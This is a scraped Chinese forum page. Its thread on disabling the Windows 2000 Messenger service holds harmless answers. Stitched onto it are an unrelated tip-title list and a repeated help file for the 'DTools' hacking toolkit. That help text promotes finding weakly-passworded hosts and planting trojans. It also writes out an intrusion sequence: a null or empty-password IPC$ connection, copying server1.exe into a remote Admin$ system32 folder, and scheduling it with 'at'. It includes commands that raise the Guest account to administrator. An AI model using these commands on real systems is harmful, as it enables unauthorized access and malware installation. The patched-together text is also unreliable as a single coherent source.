急,想关掉win2000信使服务。

lidanfeng 2003-08-23 09:57:23
急,想关掉win2000信使服务。
...全文
31 10 打赏 收藏 转发到动态 举报
写回复
用AI写文章
10 条回复
切换为时间正序
请发表友善的回复…
发表回复
clswwl 2003-08-23
  • 打赏
  • 举报
回复
谁能在DOC里关闭
qianzhao 2003-08-23
  • 打赏
  • 举报
回复
控制面板-管理工具-服务-禁用Messenger
smallrascal 2003-08-23
  • 打赏
  • 举报
回复
开始->设置->控制面板->管理工具->服务->禁用Messenger服务即可
jiemmy 2003-08-23
  • 打赏
  • 举报
回复
net stop messenger
net start messenger
No001 2003-08-23
  • 打赏
  • 举报
回复
net stop msg

在MMC的服务里设置,你一看就明白了


run-->mmc
lidanfeng 2003-08-23
  • 打赏
  • 举报
回复
thank you muake
muake 2003-08-23
  • 打赏
  • 举报
回复
屏蔽恼人的Windows XP“信使服务”
http://tech.sina.com.cn/c/2003-07-03/20718.html

在Windows XP中,“信使服务”在服务列表中名称为“Messenger”,该服务用来传输客户端和服务器之间的Net Send和Alerter(报警器)服务消息。此服务与Windows Messenger无关。默认情况下,“信使服务”是打开的,所以当你的电脑连接到Internet上时,一些网站(包括厂商网站)可以通过该服务发送一些信息,在目标用户的计算机上会弹出一个名为“信使服务”的对话框。这些不请自到的“信使”通常是一些广告等无用信息,而且在你使用电脑时,突然出现的“信使服务”会干扰工作。我们可以使用下述方法关闭“信使服务”。

  1.运行命令法
  单击Windows“开始”菜单,单击“运行”。在“打开”框中,键入“net stop messenger”。单击“确定”按钮。
  命令“net stop messenger”的作用是停止“信使服务”,要启用“信使服务”,请使用“net start messenger”命令。

  2.服务设置法
  打开“控制面板”,单击“性能和维护”,单击“管理工具”,双击“服务”。单击“Messenger”,然后在“操作”菜单中,单击“属性”。进入“常规”选项卡,单击“停止”按钮,再将“启动类型”改为“手动”或“已禁用”。如果“Messenger”服务被停止,Alerter消息不会被传输。如果“Messenger”服务被禁用,任何直接依赖于它的服务将无法启动,这正是我们所希望的。最后单击“确定”按钮。

  以后,恼人的“信使服务”就不会再打扰你了。
lidanfeng 2003-08-23
  • 打赏
  • 举报
回复
我的是专业版没有net send stop
yanghaoa 2003-08-23
  • 打赏
  • 举报
回复
在系统服务里找到:Messenger 这个服务.把它禁掉或关掉都行.
javawater 2003-08-23
  • 打赏
  • 举报
回复
net send stop
最新网管精华实用技巧170篇 2000XP双系统启动问题 ADSL拨号中出现的错误代码 AWARD BIOS设置详解 BIOS与CMOS区别 CMOS密码清除方法 DOS下安装WinXP方法 DOS中使用系统还原工具 Explorer的作用 folder.htt等文件的问题 found.000文件夹的问题 Mfm1992文件问题 Regsvr32使用方法 Regsvr32修复系统故障 RUNDLL32内容 Win2000XP启动详解 Win2000进程 Win2000使用纯DOS的方法 Win2000优化技巧 Windows常用命令集 Windows系统安装 windows下的EXE文件 WinXP常见进程 winxp的boot文件 winXP几项设置 WinXP开机菜单含义 winXP免激活升级 winXP去除登陆画面 WinXP瘦身办法 winXP瘦身减肥大全 WinXP系统内置的AT命令 WinXP系统自动关机 WINXP优化精髓 WinXP中对文件进行加密 WinXP中运行DOS程序 winXP重装不需激活 Win操作系统安装方法 操作系统进程描述 操作系统与系统配置 常见电脑故障处理方法 常见死机原因剖析 处理冲击波 磁盘格式的问题 电脑死机故障分析 更改IE默认搜索引擎 更改临时文件夹的路径 更改屏幕保护程序关联 更改输入法调出顺序 更改系统源文件途径 关闭WinXP的错误报告 关闭没有响应的程序 黑屏的几个原因 恢复开始菜单的运行 加快WinXP窗口显示速度 加快软驱传输速度 解决A盘不见的方法 解决EXE关联丢失方法 解决IE二级链接方法 解决IE器常见故障 解决IP地址冲突的方法 解决NTFS下Win2000密码丢失 解决reg.inf文件被锁定 解决Win98不能关机问题 解决WinXP启动慢问题 解决WinXP搜索故障 解决XP输入法不见问题 解决XP搜索失效问题 解决不定时搜寻软驱问题 解决部分软件无法安装 解决插电即开机问题 解决窗口按钮上乱码问题 解决打开硬盘分区出错 解决导入reg文件对话框 解决多系统安装问题 解决多硬盘盘符混乱问题 解决关机变重启故障 解决光驱读盘不正常 解决回收站无法清空 解决活动窗口按钮被改写 解决接通电源后自动开机问题 解决开关机停止响应 解决开机ESCD错误 解决开始菜单响应慢 解决控件提示问题 解决某些网页不能访问 解决内存不足问题 解决任务栏图标变大 解决鼠标乱动问题 解决鼠标右键被锁定 解决添加删除程序隐藏问题 解决图标乱套问题 解决网页恶意代码方案 解决忘记账户密码问题 解决文件保护方法 解决无法打开文件夹 解决无法关机问题 解决无法升级更新 解决无法自动保存设置 解决系统声音不正常 解决系统托盘区的图标丢失 解决系统无法保存设置 解决系统资源不足问题 解决系统资源严重不足 解决显示器花屏问题 解决限制使用应用程序问题 解决音量自动调节问题 解决应用程序被禁用 解决硬盘坏磁道问题 解决硬盘引导型故障 解决右键菜单响应慢 解决右键发送到问题 解决桌面图标乱的方法 解决自动搜索软驱 禁用指定DOS命令办法 禁止ipc$默认共享的方法 禁止Win2000启动时读软驱 禁止winxp默认共享 禁止WinXP文件夹自动展开 禁止光盘自动运行 控制面板大全 破解IE分级密码 破解网页禁用鼠标右键 清除WinXP任务栏图标 取消磁盘扫描 取消磁盘扫描等待时间 如何保存网页的背景音乐 如何彻底删除输入法文件 如何防止篡改注册表 如何关闭CD自动播放功能 如何关闭Dr.Watson 如何加密文件及文件夹 如何进入BIOS设置 如何启动休眠功能 如何清除冰河 如何让注册表保持在根目录 如何设置从光驱启动 如何设置显别人的IP 如何设置显示器 如何实现关机时清空页面文件 如何使IE不发错误报告 如何使用Tasklist命令 如何使用系统还原 如何锁住桌面背景 如何挽救软盘文件 如何移动收藏夹 如何隐藏磁盘驱动器 如何优化BIOS 如何找到自启动程序 如何自动重启 删除NTFS分区 删除屏幕保护和壁纸 删除系统备份文件 删除信使服务 设置窗口自动刷新 设置任务管理器 设置虚拟内存 什么时信使服务 什么是host表 什么是软件版本标志 双系统安装方法 双系统的安全卸载 双系统共用虚拟内存 双系统问题集合 限制驱动器的使用 隐藏光驱的方法 隐藏启动程序方法 隐藏驱动器一法 隐藏添加删除程序 隐藏桌面回收站方法 隐藏桌面所有图标 找回显示桌面按钮 自动释放系统资源
Windows问答精华 001工具地址.txt 2000XP双系统启动问题.txt ADSL拨号中出现的错误代码 .txt at命令的用法.txt AWARD BIOS设置详解.txt BIOS与CMOS区别 .txt BIOS可以被映射.txt BIOS报警声.txt BIOS错误信息.txt CMOS密码清除方法.txt DOS下安装WinXP方法.txt DOS中使用系统还原工具.txt Explorer的作用.txt folder.htt等文件的问题.txt found.000文件夹的问题.txt IE以最大化显示.txt Mfm1992文件问题.txt Regsvr32 用法和错误消息的说明.tx Regsvr32使用方法.txt Regsvr32修复系统故障.txt RUNDLL32内容.txt SFC使用方法.txt Win2000XP启动详解.txt Win2000优化技巧.txt Win2000使用纯DOS的方法.txt Win2000进程.txt windows下的EXE文件.txt Windows常用命令集.txt Windows系统安装.txt WinXP中对文件进行加密.txt WinXP中运行DOS程序.txt WINXP优化精髓.txt winXP免激活升级.txt winXP几项设置.txt winXP去除登陆画面.txt WinXP常见进程.txt WinXP开机菜单含义.txt winXP瘦身减肥大全.txt WinXP瘦身办法.txt winxp的boot文件.txt WinXP系统内置的AT命令.txt WinXP系统自动关机.txt winXP重装不需激活.txt Win操作系统安装方法.txt 为文件夹添加背景音乐.txt 什么时信使服务.txt 什么是 DirectX.txt 什么是host表.txt 什么是POP3和SMTP.txt 什么是Smartdrv程序.txt 什么是丢包.txt 什么是端口.txt 什么是虚拟文件分配表.txt 什么是软件版本标志.txt 使用说明.txt 关闭WinXP的错误报告.txt 关闭没有响应的程序.txt 删除IE右键菜单内容.txt 删除NTFS分区.txt 删除信使服务.txt 删除启动选项中的选项.txt 删除屏幕保护和壁纸.txt 删除添加删除程序的无效信息.txt 删除系统备份文件.txt 删除虚拟光驱遗留盘符.txt 删除隐藏不活动的图标.txt 删除鼠标右键遗留菜单.txt 加快WinXP窗口显示速度.txt 加快软驱传输速度.txt 双系统共用虚拟内存.txt 双系统安装方法.txt 双系统的安全卸载.txt 双系统问题集合.txt 双系统默认启动项更改.txt 取消磁盘扫描.txt 取消磁盘扫描等待时间.txt 在Win2000使用纯DOS方法.txt 在WinXP中运行DOS程序.txt 处理冲击波.txt 如何优化BIOS.txt 如何使IE不发错误报告.txt 如何使用Tasklist命令.txt 如何使用系统还原.txt 如何保存网页的背景音乐.txt 如何关闭CD自动播放功能.txt 如何关闭Dr.Watson.txt 如何加密文件及文件夹.txt 如何启动休眠功能.txt 如何实现关机时清空页面文件.txt 如何彻底删除输入法文件.txt 如何找到自启动程序.txt 如何挽救软盘文件.txt 如何清除冰河.txt 如何直接移动应用程序.txt 如何移动收藏夹.txt 如何自动重启.txt 如何让注册表保持在根目录.txt 如何设置从光驱启动.txt 如何设置显别人的IP.txt 如何设置显示器.txt 如何进入BIOS设置.txt 如何重新安装IE浏览器.txt 如何锁住桌面背景.txt 如何防止篡改注册表.txt 如何隐藏磁盘驱动器.txt 常见死机原因剖析.txt 常见电脑故障处理方法.txt 恢复开始菜单的运行.txt 找回显示桌面按钮.txt 找回桌面图标透明效果.txt 控制面板大全.txt 操作系统与系统配置.txt 操作系统进程描述.txt 更改IE默认搜索引擎.txt 更改临时文件夹的路径.txt 更改屏幕保护程序关联.txt 更改系统源文件途径.txt 更改输入法调出顺序.txt 清除WinXP任务栏图标.txt 电脑死机故障分析.txt 破解IE分级密码.txt 破解网页禁用鼠标右键.txt 硬盘物理坏道处理方法.txt 磁盘格式的问题.txt 禁止ipc$默认共享的方法.txt 禁止Win2000启动时读软驱.txt 禁止WinXP文件夹自动展开.txt 禁止winxp默认共享.txt 禁止光盘自动运行.txt 禁用指定DOS命令办法.txt 自动关闭停止响应程序.txt 自动安装Windows XP.txt 自动开启小键盘上NumLock.txt 自动清除地址栏的记录.txt 自动释放系统资源.txt 虚拟软驱.txt 解决A盘不见的方法.txt 解决EXE关联丢失方法.txt 解决IE二级链接方法.txt 解决IE器常见故障.txt 解决IP地址冲突的方法.txt 解决NTFS下Win2000密码丢失.txt 解决reg.inf文件被锁定.txt 解决Win98不能关机问题.txt 解决WinXP启动慢问题.txt 解决WinXP搜索故障.txt 解决XP搜索失效问题.txt 解决XP输入法不见问题.txt 解决不定时搜寻软驱问题.txt 解决任务栏图标变大.txt 解决光驱读盘不正常.txt 解决关机变重启故障.txt 解决内存不足问题.txt 解决右键发送到问题.txt 解决右键菜单响应慢.txt 解决回收站无法清空.txt 解决图标乱套问题.txt 解决多硬盘盘符混乱问题.txt 解决多系统安装问题.txt 解决导入reg文件对话框.txt 解决应用程序被禁用.txt 解决开关机停止响应.txt 解决开始菜单响应慢.txt 解决开机ESCD错误.txt 解决忘记账户密码问题.txt 解决打开硬盘分区出错.txt 解决接通电源后自动开机问题.txt 解决控件提示问题.txt 解决插电即开机问题.txt 解决文件保护方法.txt 解决无法关机问题.txt 解决无法升级更新.txt 解决无法打开文件夹.txt 解决无法自动保存设置.txt 解决显示器花屏问题.txt 解决某些网页不能访问.txt 解决桌面图标乱的方法.txt 解决活动窗口按钮被改写.txt 解决添加删除程序隐藏问题.txt 解决硬盘坏磁道问题.txt 解决硬盘引导型故障.txt 解决窗口按钮上乱码问题.txt 解决系统声音不正常.txt 解决系统托盘区的图标丢失.txt 解决系统无法保存设置.txt 解决系统资源不足问题.txt 解决系统资源严重不足.txt 解决网页恶意代码方案.txt 解决自动搜索软驱.txt 解决部分软件无法安装.txt 解决限制使用应用程序问题.txt 解决音量自动调节问题.txt 解决鼠标乱动问题.txt 解决鼠标右键被锁定.txt 设置任务管理器.txt 设置开始菜单中的用户名.txt 设置窗口自动刷新.txt 设置虚拟内存.txt 运行命令.txt 通过CMOS设置定时开机.txt 限制驱动器的使用.txt 隐藏光驱的方法.txt 隐藏启动程序方法.txt 隐藏控制面板中的选项.txt 隐藏桌面回收站方法.txt 隐藏桌面所有图标.txt 隐藏添加删除程序.txt 隐藏驱动器一法.txt 黑屏的几个原因.txt
::: 啊D网络工具包 帮助文件 ::: 软件功能如下: --------------------------------------------------------------------------------- 1. 共享资源查找 [为你查找网上的共享资源!] 2. 肉鸡查找 [查找一个网段NT,Win2000密码过于简单的主机,还加入了系统版本识别,使用更方便] 3. 远程服务查看 [你可以查看和修改远程的服务,如关闭和启动Telnet,更方便!] 4. 查看隐藏共享 [查看远程计算机的全部共享,包括隐藏的共享也可以查看的到,查看共享更方便] 5. 查看用户组信息 [Win介面的查看远程机子的用户和组的信息,便用更方便!] 6. 开远程的Telnet [直截开启微软自带的Telnet,开Telnet,原来也可以这么简单!] 3. NT消息发送 [向NT的机子发送消息,便用Win介面使用更方便!] 3. IP端口扫描 [有针对性的查看整个网段的某个端口,如冰河端口7626] 4. 端口扫描 [使你更加了解对方主机端口的打开状况] 5. 网卡MAC [快速获取一个网段的 用户名、工作组、对方的网卡MAC地址] 6. 网络状态查看 [知道自己机子打开了什么端口吗?本程序可帮上你的忙!] 7. 主机查询 [知道IP的的所在地?知道某地有哪些IP,本程序可帮上你的忙!] 8. Ping [判断某IP是否和网络连接的好帮手!] 9. 域名<=>IP [知道域名对应的IP,知道IP对应的域名,本程序可以帮助你!] 10. 路由查看 [知道某IP经过的路由?用本程序就可以给你答案!] 11. Finger [Finger能为你查询对方系统的用户信息!] 12. 进程查看 [查看正在运行的软件,查木马还是有一定的帮助的!] 13. 本机IP [在上网的时候,知道自己的IP吗?本程序可以为你办到!] 14. 常用修改 [反恶意网页修改,恢复系统设置等] 19. 查错误代号说明 [不知道51这个代号表示什么错误,查一查就知道了!] --------------------------------------------------------------------------------- 支持的系统:win98/WinMe/win2000/WinXP/WinNT 功能键说明: Ctrl+'1' ~ '9' 显示指定数字的页面 CtrL+'-' 前一页 CtrL+'+' 后一页 * 在IP1输入框里双击鼠标左键转到"主机查询" * 在IP2输入框里双击鼠标左键将把IP2输入框的IP转为IP1输入框的IP! * 在程序里,大部分地方都有右键功能! =================================== 文件组成 =================================== DTools.exe 主要的执行文件 Help.txt 帮助文件 Setup.ini 设置文件 IP.^_^ IP数据文件 *.d99 共享资源文件 *.Por 指定扫描的端口文件 =================================== 关于 =================================== 制作人: 啊D QQ号码: 9269563 邮 箱: paf@163.net 网 址: http://d99.126.com 地 址: 深圳市龙岗区坪山镇石井太阳村 如果觉得本软件不错,请发一份电子信件, 表示对作者的支持! 在使用中发现错误,请记下你的测试环境,告诉我!以便更好地解决问题,先谢! 注: 本软件为免费软件,对使用本软件产生的后果,由使用者承担! 本软件可随意转载,转载时请确保文件的完整!未经同意,请勿用于商业用途! ================================================================== 一些常用的DOS网络命令 ================================================================== net share abc$=c:\ 将c:盘映射为 abc$ (加了“$”之后为隐藏的共享目录) net share c$ /del 禁止C$共享 net use z: \\*.*.*.*\C$ 把 *.*.*.*(IP) 的共享 C$ 映射为本地的 Z:盘 net use c: /del 删除映射的c盘 net use * /del /y 删除全部 net start 显示本地主机当前服务 net start telnet 启动 Telnet 服务 net start Server 启动 Server 服务 (IPC$ 和共享要靠这个服务) net stop Messenger 停止信使服务(不会在有烦人的Win的弹出广告了)! net stop server 停止Server 服务 (关了这服务,远程的机子就不能查看你的共享和用IPC$入侵) net user 得到本地主机的用户列表 net user guest /active:yes 将停用的guest帐号激活(变为可用) net user guest 888888 把 Guest 帐号的密码改为 888888 net localgroup Administrators guest /add 把 Guest 加到Administrators组中(这样你就有了超级权限了) net view \\*.*.*.* 查看指定IP主机上的共享 nbtstat -A *.*.*.* 得到远程主机的NetBIOS用户名列表 net share 查看本地主机的共享资源(本地的默认共享也可以看到) net use \\*.*.*.*\ipc$ "" /user:"" 建立空连接 telnet *.*.*.* 90 连接对方机子的telnet,端口为90 ipconfig 查看本机的IP信息 入侵ipc过程序命令 ----------------------------------------------- net use \\*.*.*.*\ipc$ "" /user:"Administrator" 建立用户名为 Administrator 密码为空的连接 copy server1.exe \\*.*.*.*\Admin$\system32 即将当前目录下的Server1.exe复制到对方Admin$共享的System32目录内 net time \\*.*.*.* 查看远程主机的当前时间 at \\*.*.*.* 14:00 server1.exe 在对方机子添加一个在 14:00 运行 server1.exe 的任务 netstat [-r] [-s] [-n] [-a] 参数含义: -r 显示本机路由表的内容; -s 显示每个协议的使用状态(包括TCP协议、UDP协议、IP协议); -n 以数字表格形式显示地址和端口; -a 显示所有主机的端口号。 ------------------------------------------------------------------ ================================================================= 更新 ================================================================= DTools 2.01 更新情况(2004.4.3) * 更新了过期问题。 * 加入公告板。 DTools 2.0 更新情况(2003.8.15) * 强加了远程查看和修改服务功能。 * 强加了查看隐藏共享。 * 强加了查看用户和组信息。 * 强加了NT消息发送。 * 强加了远程开Telnet的功能。 * 强加了查错误代号说明。 * 价面作了修改。 * 修正了在IP1里不能用快捷建 "Ctrl+C" "Ctrl+V" 等问题! 使复制和粘贴更方便! * 软件介面大小可以自由调整!使用更方便! * "肉鸡查找"增加了识别对方系统版本功能!使"肉对查找"有更体贴的感受! * "木马种植"可以只在对方系统添加命令,而不复制文件!就像远程Telnet这么好用! * 修正了"主机查询"的读取某些追捕数据文件会出错的问题! * "网络状态"的右键菜单加入了"查看所有端口所明",知道你的机子打开端口的说明,一按就全知道! * "路由查看"增加了"显示域名"和"显示对方IP所在地"的功能,了解路由机子的信息更方便! * "共享资源查找"增加了"自动保存"! * 在主机框里输入IP将会在全部的IP框中加入刚输入的地址!在IP框中输入IP也会把IP加入主机框中!减少了复制、粘贴的工作量! DTools 1.01 更新情况(2003.4.20) * 增加了网卡MAC地址查看功能! * 增加了肉鸡(IPC$)查找功能! * 增加了木马(IPC$)种植! * 增加了读取NT用户列表功能! * 增加了Finger功能! * 增强了共享资源查找器的功能,在win2000下能查找 C$ D$ .. IPC$ ADMIN$ 等隐藏共享目录 * 修改了共享查找的介面 * 删除了密码查看功能 * 修正了在Win2000下不能运行的问题 * 修正了一些Bug * 介面作了少量改动! * 添加了"在桌面加入快捷方式"的功能! * 外置了端口说明!
啊d网络工具包是可以用用“IP端口”扫描可以用针对性的查看整个网段的某个打开的软口!如冰河端口7626,win的共享端口139等 功能键说明: Ctrl+'1' ~ '9' 显示指定数字的页面 CtrL+'-' 前一页 CtrL+'+' 后一页 * 在IP1输入框里双击鼠标左键转到"主机查询" * 在IP2输入框里双击鼠标左键将把IP2输入框的IP转为IP1输入框的IP! * 在程序里,大部分地方都有右键功能! =================================== 文件组成 =================================== DTools.exe 主要的执行文件 Help.txt 帮助文件 Setup.ini 设置文件 IP.^_^ IP数据文件 *.d99 共享资源文件 *.Por 指定扫描的端口文件 1. Ping:判断某IP是否和网络连接的好帮手! 2. 共享资源查找:为你查找网上的共享资源! 3. 常用修改:反恶意网页修改,恢复系统设置等 4. Finger:Finger能为你查询对方系统的用户信息! 5. 端口扫描:使你更加了解对方主机端口的打开状况 6 NT消息发送:向NT的机子发送消息,便用Win介面使用更方便! 7. 路由查看:知道某IP经过的路由?用本程序就可以给你答案! 8. 进程查看:查看正在运行的软件,查木马还是有一定的帮助的! 9. 本机IP:在上网的时候,知道自己的IP吗?本程序可以为你办到! 10. IP端口扫描:有针对性的查看整个网段的某个端口,如冰河端口7626! 11. 网卡MAC:快速获取一个网段的 用户名、工作组、对方的网卡MAC地址 12.查错误代号说明 [不知道51这个代号表示什么错误,查一查就知道了! 13.网络状态查看:知道自己机子打开了什么端口吗?本程序可帮上你的忙! 14.域名<=>IP:知道域名对应的IP,知道IP对应的域名,本程序可以帮助你! 15.远程服务查看:你可以查看和修改远程的服务,如关闭和启动Telnet,更方便! 16.主机查询:知道IP的的所在地?知道某地有哪些IP,本程序可帮上你的忙! 17.查看用户组信息:Win介面的查看远程机子的用户和组的信息,便用更方便! 18.开远程的:Telnet直截开启微软自带的Telnet,开Telnet,原来也可以这么简单! 19.肉鸡查找:查找一个网段NT,Win2000密码过于简单的主机,还加入了系统版本识别,使用更方便 20.查看隐藏共享:查看远程计算机的全部共享,包括隐藏的共享也可以查看的到,查看共享更方便! 一些常用的DOS网络命令 ================================================================== net share abc$=c:\ 将c:盘映射为 abc$ (加了“$”之后为隐藏的共享目录) net share c$ /del 禁止C$共享 net use z: \\*.*.*.*\C$ 把 *.*.*.*(IP) 的共享 C$ 映射为本地的 Z:盘 net use c: /del 删除映射的c盘 net use * /del /y 删除全部 net start 显示本地主机当前服务 net start telnet 启动 Telnet 服务 net start Server 启动 Server 服务 (IPC$ 和共享要靠这个服务) net stop Messenger 停止信使服务(不会在有烦人的Win的弹出广告了)! net stop server 停止Server 服务 (关了这服务,远程的机子就不能查看你的共享和用IPC$入侵) net user 得到本地主机的用户列表 net user guest /active:yes 将停用的guest帐号激活(变为可用) net user guest 888888 把 Guest 帐号的密码改为 888888 net localgroup Administrators guest /add 把 Guest 加到Administrators组中(这样你就有了超级权限了) net view \\*.*.*.* 查看指定IP主机上的共享 nbtstat -A *.*.*.* 得到远程主机的NetBIOS用户名列表 net share 查看本地主机的共享资源(本地的默认共享也可以看到) net use \\*.*.*.*\ipc$ "" /user:"" 建立空连接 telnet *.*.*.* 90 连接对方机子的telnet,端口为90 ipconfig 查看本机的IP信息 入侵ipc过程序命令 ----------------------------------------------- net use \\*.*.*.*\ipc$ "" /user:"Administrator" 建立用户名为 Administrator 密码为空的连接 copy server1.exe \\*.*.*.*\Admin$\system32 即将当前目录下的Server1.exe复制到对方Admin$共享的System32目录内 net time \\*.*.*.* 查看远程主机的当前时间 at \\*.*.*.* 14:00 server1.exe 在对方机子添加一个在 14:00 运行 server1.exe 的任务 netstat [-r] [-s] [-n] [-a] 参数含义: -r 显示本机路由表的内容; -s 显示每个协议的使用状态(包括TCP协议、UDP协议、IP协议); -n 以数字表格形式显示地址和端口; -a 显示所有主机的端口号。 DTools啊D网络工具包 更新说明; * 强加了远程查看和修改服务功能。 * 强加了查看隐藏共享。 * 强加了查看用户和组信息。 * 强加了NT消息发送。 * 强加了远程开Telnet的功能。 * 强加了查错误代号说明。 * 价面作了修改。 * 修正了在IP1里不能用快捷建 "Ctrl+C" "Ctrl+V" 等问题! 使复制和粘贴更方便! * 软件介面大小可以自由调整!使用更方便! * "肉鸡查找"增加了识别对方系统版本功能!使"肉对查找"有更体贴的感受! * "木马种植"可以只在对方系统添加命令,而不复制文件!就像远程Telnet这么好用! * 修正了"主机查询"的读取某些追捕数据文件会出错的问题! * "网络状态"的右键菜单加入了"查看所有端口所明",知道你的机子打开端口的说明,一按就全知道! * "路由查看"增加了"显示域名"和"显示对方IP所在地"的功能,了解路由机子的信息更方便! * "共享资源查找"增加了"自动保存"!

6,185

社区成员

发帖
与我相关
我的任务
社区描述
windows网络管理与配置
社区管理员
  • 网络管理与配置社区
加入社区
  • 近7日
  • 近30日
  • 至今
社区公告
暂无公告

试试用AI创作助手写篇文章吧